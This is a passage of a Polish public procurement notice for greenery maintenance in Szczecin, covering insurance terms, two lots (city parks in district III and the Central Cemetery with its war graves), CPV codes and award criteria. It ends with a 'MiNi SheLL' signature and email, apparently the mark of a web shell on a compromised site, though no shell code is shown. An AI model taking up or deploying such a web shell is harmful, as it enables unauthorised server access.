B.	termin obowiązywania gwarancji,
C.	przypadki, w których gwarancja traci ważność, w tym miejsce i termin zwrotu gwarancji.
h)	Zamawiający może, na wniosek wykonawcy, wyrazić zgodę na zmianę formy wniesionego zabezpieczenia pod warunkiem zachowania ciągłości zabezpieczenia i nie zmniejszenia jego wysokości.
        3)  umowę ubezpieczenia: 
      a)	Wykonawca zobowiązany jest do posiadania umowy ubezpieczenia OC za szkody wyrządzone na mieniu lub na osobie, powstałe w związku z realizacją prac określonych w umowie, szkody powstałe z tytułu niewykonania lub nienależytego wykonania umowy - przy sumie gwarancyjnej nie mniejszej niż kwota w ofercie cenowej. Wykonawca zobowiązany jest do posiadania ochrony ubezpieczeniowej przez okres wykonywania umowy.
b)  obowiązek zawarcia ubezpieczenia będzie uważany za spełniony w przypadku,   gdy Wykonawca przekaże Zamawiającemu polisę obejmującą odpowiedzialność cywilną wraz z dowodem opłaty składki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce 
i pasy drogowe) - rejon III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> (Zamawiający działa w imieniu własnym i na rzecz Zarządu Dróg i Transportu Miejskiego w Szczecinie zgodnie z art. 16 ust. 4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - t.j. Dz. U. z 2015 r. poz. 2164)
      Konserwacja i utrzymanie zieleni miejskiej w Szczecinie (parki, zieleńce i pasy drogowe) - rejon III

CPV: 
77310000-6  Usługi sadzenia roślin i utrzymania terenów zielonych

2.  Przedmiot zamówienia został szczegółowo określony w załącznikach nr 10/I - 14/I 
do SIWZ.
3.	Wykonawca wykona przedmiot zamówienia zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, m. in. ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21), ustawą 
z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz.U. z 2013 r. poz. 1232 
ze zmianami), ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (t.j. Dz.U. z 2013 r. poz. 627 ze zmianami), ustawą z dnia 13 września 1996 r. o utrzymaniu czystości 
i porządku w gminach (t.j. Dz.U. z 2013 r. poz. 1399 ze zmianami) oraz z zapisami Specyfikacji Istotnych Warunków Zamówienia i ofertą, które będą stanowiły integralną część umowy.
4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty w przypadku:
1)	niewykorzystania środków wynikających z maksymalnego wynagrodzenia kosztorysowego Wykonawcy za konserwację i utrzymanie zieleni miejskiej w parkach i zieleńcach lub za konserwację i utrzymanie zieleni miejskiej w pasach drogowych. Zamawiający wówczas ma prawo przesunięcia pozostałej kwoty na poczet konserwacji i utrzymania zieleni miejskiej w parkach i zieleńcach lub na poczet konserwacji i utrzymania zieleni miejskiej w pasach drogowych. W takim przypadku na uzasadniony wniosek Zamawiającego zmiana zostanie wprowadzona aneksem do umowy.
6. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać:
1) opis zmiany,
2)  uzasadnienie zmiany,
3)  koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)  czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja i utrzymanie zieleni na terenie Cmentarza Centralnego w Szczecinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia został szczegółowo określony w 
załącznikach 10/II, 13/II, 14/II do SIWZ.

2.    Grobownictwo wojenne obejmują następujące obiekty:

-        Kwatera Wojenna Żołnierzy Wojska Polskiego i Armii Radzieckiej,

-        Mogiła zbiorowa żołnierzy Bojowego Oddziału Armii (formacji 
podziemia niepodległościowego),

-        Kwatera Wojenna Jeńców Belgijskich oraz Jeńców Wojska Polskiego,

-        Cmentarz Jeńców Francuskich przy ul. Litewskiej,

-        Mogiła zbiorowa na Cmentarzu Komunalnym w Dąbiu.

3.    Zamawiający informuje, że Cmentarz Centralny wpisany jest do 
rejestru zabytków pod numerem 1066 na podstawie decyzji z dnia 16 
czerwca 1985 r. Wojewódzkiego Konserwatora Zabytków (L.dz. 
KL.III.5340/10/85). Ochronie podlega układ przestrzenny, ciągi 
komunikacyjne, infrastruktura techniczna, mała architektura oraz zieleń 
niska i wysoka.

4.    Ze względu na rosnący na Cmentarzu Centralnym cenny drzewostan 
zabrania się poruszania ciężkimi, wielotonowymi (z wysokimi burtami) 
pojazdami, które narażałyby konary oraz gałęzie drzew na uszkodzenie, a 
nawierzchnie alejek na dewastacje.

5.    Wykonawca wykona przedmiot zamówienia zgodnie z zasadami 
współczesnej wiedzy technicznej, obowiązującymi normami, przepisami 
prawa powszechnie obowiązującego, m. in. ustawą z dnia 14 grudnia 2012 
r. o odpadach (Dz.U. z 2013 r. poz. 21), ustawą z dnia 27 kwietnia 2001 
r. Prawo ochrony środowiska (t.j. Dz.U. z 2013 r. poz. 1232 ze 
zmianami), ustawą z dnia 16 kwietnia 2004 r. o ochronie przyrody (t.j. 
Dz.U. z 2013 r. poz. 627 ze zmianami), ustawą z dnia 13 września 1996 r. 
o utrzymaniu czystości i porządku w gminach (t.j. Dz.U. z 2013 r. poz. 
1399 ze zmianami) oraz z zapisami Specyfikacji Istotnych Warunków 
Zamówienia i ofertą, które będą stanowiły integralną część umowy.



CPV:

77310000-6  Usługi sadzenia roślin i utrzymania terenów zielonych

77211500-2  Usługi pielęgnacji drzew.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.21.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com